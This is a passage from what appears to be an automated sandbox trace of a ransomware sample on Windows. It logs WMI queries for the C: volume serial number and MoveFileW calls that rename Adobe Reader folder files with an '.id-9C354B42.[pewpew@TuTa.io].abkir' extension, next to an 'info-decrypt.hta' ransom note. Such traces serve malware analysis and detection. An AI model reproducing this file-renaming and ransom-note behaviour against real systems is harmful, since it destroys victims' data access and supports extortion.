[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6025920) returned 0x0 [0144.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0144.671] WbemDefPath:IUnknown:AddRef (This=0x6025920) returned 0x3 [0144.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0144.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0144.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbe22d0) returned 0x0 [0144.671] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe22d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0144.671] WbemDefPath:IUnknown:Release (This=0xbe22d0) returned 0x3 [0144.671] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0144.671] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0144.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0144.671] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x2 [0144.671] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x1 [0144.671] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0144.671] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0144.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6025920) returned 0x0 [0144.672] WbemDefPath:IUnknown:AddRef (This=0x6025920) returned 0x3 [0144.672] WbemDefPath:IUnknown:Release (This=0x6025920) returned 0x2 [0144.672] WbemDefPath:IWbemPath:SetText (This=0x6025920, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0144.672] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025920, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0144.672] WbemDefPath:IWbemPath:GetText (in: This=0x6025920, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0144.672] WbemDefPath:IWbemPath:GetText (in: This=0x6025920, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0144.672] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0144.672] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0144.672] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0144.672] IUnknown:Release (This=0xb51e34) returned 0x0 [0144.673] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x602b360) returned 0x0 [0144.673] WbemLocator:IUnknown:QueryInterface (in: This=0x602b360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0144.673] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6024940) returned 0x0 [0144.673] WbemLocator:IUnknown:Release (This=0x602b360) returned 0x0 [0144.673] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6024940) returned 0x0 [0144.673] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0144.674] WbemLocator:IUnknown:AddRef (This=0x6024940) returned 0x3 [0144.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0144.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0144.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0144.674] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0144.674] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xbe1ecc | out: ppv=0xbe1ecc*=0xb51e28) returned 0x0 [0144.674] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0144.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0144.674] WbemLocator:IUnknown:Release (This=0x6024940) returned 0x2 [0144.674] WbemLocator:IUnknown:Release (This=0x6024940) returned 0x1 [0144.674] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0144.674] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0144.674] WbemLocator:IUnknown:QueryInterface (in: This=0x6024940, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6024940) returned 0x0 [0144.674] WbemLocator:IUnknown:AddRef (This=0x6024940) returned 0x3 [0144.674] WbemLocator:IUnknown:Release (This=0x6024940) returned 0x2 [0144.675] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025920, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0144.675] WbemDefPath:IWbemPath:GetText (in: This=0x6025920, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0144.675] WbemDefPath:IWbemPath:GetText (in: This=0x6025920, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0144.675] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6024930) returned 0x0 [0144.675] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024930, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x601cc4c) returned 0x0 [0146.877] WbemLocator:IUnknown:QueryInterface (in: This=0x601cc4c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5a8c4) returned 0x0 [0146.877] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a8c4, pProxy=0x601cc4c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0146.878] WbemLocator:IUnknown:Release (This=0xb5a8c4) returned 0x1 [0146.878] WbemLocator:IUnknown:QueryInterface (in: This=0x601cc4c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5a8e4) returned 0x0 [0146.878] WbemLocator:IUnknown:QueryInterface (in: This=0x601cc4c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5a8c4) returned 0x0 [0146.878] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a8c4, pProxy=0x601cc4c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0146.878] WbemLocator:IUnknown:Release (This=0xb5a8c4) returned 0x2 [0146.878] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0146.878] CoTaskMemFree (pv=0xbd4a68) [0146.878] WbemLocator:IUnknown:Release (This=0x6024930) returned 0x0 [0146.878] WbemLocator:IUnknown:QueryInterface (in: This=0x601cc4c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5a8e4) returned 0x0 [0146.878] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0146.879] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0146.880] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0146.880] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0146.883] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0146.884] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5a844) returned 0x0 [0146.884] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0146.884] WbemLocator:IUnknown:Release (This=0xb5a844) returned 0x3 [0146.884] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0146.885] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0146.885] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5a8cc) returned 0x0 [0146.885] WbemLocator:IRpcOptions:Query (in: This=0xb5a8cc, pPrx=0xb5a8e4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0146.885] WbemLocator:IUnknown:Release (This=0xb5a8cc) returned 0x3 [0146.885] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0146.885] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0146.885] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0146.885] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x601cc4c) returned 0x0 [0146.885] WbemLocator:IUnknown:AddRef (This=0x601cc4c) returned 0x4 [0146.885] WbemLocator:IUnknown:Release (This=0x601cc4c) returned 0x3 [0146.885] WbemLocator:IUnknown:Release (This=0x601cc4c) returned 0x2 [0146.885] SysStringLen (param_1=0x0) returned 0x0 [0146.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025990, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0146.885] WbemDefPath:IWbemPath:GetText (in: This=0x6025990, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0146.885] WbemDefPath:IWbemPath:GetText (in: This=0x6025990, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0146.885] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0146.885] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0146.885] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5a8e4) returned 0x0 [0146.885] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x3 [0146.885] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0146.886] WbemDefPath:IWbemPath:GetText (in: This=0x6025990, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0146.886] WbemDefPath:IWbemPath:GetText (in: This=0x6025990, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0146.886] IWbemServices:GetObject (in: This=0x601cc4c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027b20, ppCallResult=0x0) returned 0x0 [0147.272] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025920, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0147.272] WbemDefPath:IWbemPath:GetText (in: This=0x6025920, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0147.272] WbemDefPath:IWbemPath:GetText (in: This=0x6025920, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0147.272] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3628700*=0, plFlavor=0x3628704*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3628700*=8, plFlavor=0x3628704*=0) returned 0x0 [0147.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.272] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3628700*=8, plFlavor=0x3628704*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3628700*=8, plFlavor=0x3628704*=0) returned 0x0 [0147.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.273] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0147.273] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0147.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0147.273] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1447e760, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0147.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0147.276] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFile") returned 0x0 [0147.279] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0147.284] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0147.285] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0147.285] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0147.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0147.285] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0147.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0147.285] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0147.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0147.285] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), fInfoLevelId=0x0, lpFileInformation=0x3628c20 | out: lpFileInformation=0x3628c20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba)) returned 1 [0147.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0147.303] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0147.303] SetThreadErrorMode (dwNewMode=0x1, 